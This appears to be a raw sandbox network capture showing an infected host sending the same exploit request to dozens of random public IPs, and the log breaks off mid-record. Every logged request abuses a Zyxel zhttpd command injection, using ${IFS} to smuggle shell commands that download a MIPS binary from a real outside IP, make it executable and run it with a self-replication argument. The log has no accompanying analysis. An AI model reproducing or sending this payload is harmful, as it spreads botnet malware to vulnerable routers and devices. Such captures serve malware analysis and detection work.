                                            Feb 2, 2024 06:21:11.603375912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3935192.168.2.153497086.39.185.9443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.603434086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3936192.168.2.1544394140.114.218.159443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.603445053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3937192.168.2.1546886138.69.106.103443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.603492022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3938192.168.2.155128477.34.216.8443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.603527069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3939192.168.2.1544562164.141.217.209443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.603578091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3940192.168.2.1553878109.176.73.69443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.603612900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3941192.168.2.155141636.46.188.193443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.603642941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3942192.168.2.1534480190.159.26.233443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.603702068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3943192.168.2.1555622110.218.99.189443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.603744030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3944192.168.2.1542568120.248.131.4443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.603779078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3945192.168.2.15502462.114.252.127443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.603842974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3946192.168.2.1535010143.30.58.65443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.603960037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3947192.168.2.1548834164.84.246.50443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.603991985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3948192.168.2.154047219.103.87.167443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.604034901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3949192.168.2.154545245.145.44.204443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.604058981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3950192.168.2.153931446.111.15.71443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.604118109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3951192.168.2.1551052219.238.25.242443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.604160070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3952192.168.2.1538716208.158.242.110443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.604192019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3953192.168.2.1552392186.125.47.33443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.604226112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3954192.168.2.1550294119.29.168.133443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.604250908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3955192.168.2.1544876163.10.123.152443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.604258060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3956192.168.2.1558902138.233.73.57443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.604310036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3957192.168.2.153358293.66.72.92443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.604343891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3958192.168.2.154444096.12.97.176443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.604379892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3959192.168.2.1558096126.112.133.85443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.604424000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3960192.168.2.1557784124.255.189.238443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.604459047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3961192.168.2.1534252146.40.242.28443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.604485035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3962192.168.2.154680646.208.97.0443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.604520082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3963192.168.2.1546772175.57.217.99443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.604584932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3964192.168.2.15405489.231.134.104443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.604619980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3965192.168.2.155384243.106.31.173443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.604677916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3966192.168.2.1560470103.104.162.54443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.604700089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3967192.168.2.153463281.220.185.208443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.604717016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3968192.168.2.1541762112.28.149.61443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.604758978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3969192.168.2.1556794126.15.159.51443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.604820013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3970192.168.2.1550060205.3.7.137443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.604862928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3971192.168.2.1542780129.40.47.27443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.604890108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3972192.168.2.1556226212.221.219.132443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.604938030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3973192.168.2.153639231.142.48.194443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.604964972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3974192.168.2.154833824.140.125.58443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.604993105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3975192.168.2.153781035.17.214.233443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.605017900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3976192.168.2.1541510129.227.23.41443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.605058908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3977192.168.2.154838886.14.18.207443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.605099916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3978192.168.2.1541742112.203.217.199443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.605149984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3979192.168.2.1543424222.34.35.70443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.605175972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3980192.168.2.1555410101.175.224.3443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.605214119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3981192.168.2.1543930207.141.95.135443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.605262995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3982192.168.2.1549064150.12.153.92443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.605319023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3983192.168.2.1547886202.194.137.122443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.605350018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3984192.168.2.155479245.107.186.147443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.605400085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3985192.168.2.1557448169.12.26.151443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.605432034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3986192.168.2.154439445.33.32.52443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.605472088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3987192.168.2.155168898.166.76.213443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.605488062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3988192.168.2.1535302222.241.114.67443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.605547905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3989192.168.2.1554146177.122.152.183443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.605588913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3990192.168.2.154616242.17.70.4443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.605608940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3991192.168.2.156084078.209.252.126443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.605654001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3992192.168.2.155054824.27.15.47443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.605694056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3993192.168.2.154827695.65.136.18443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.605739117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3994192.168.2.154387065.43.112.231443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.605772972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3995192.168.2.153789889.43.60.77443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.605811119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3996192.168.2.156054670.51.194.153443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.605865002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3997192.168.2.1554810102.30.246.152443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:11.605921984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3998192.168.2.1544518103.171.227.185443
                                            TimestampBytes transferredDirectionData
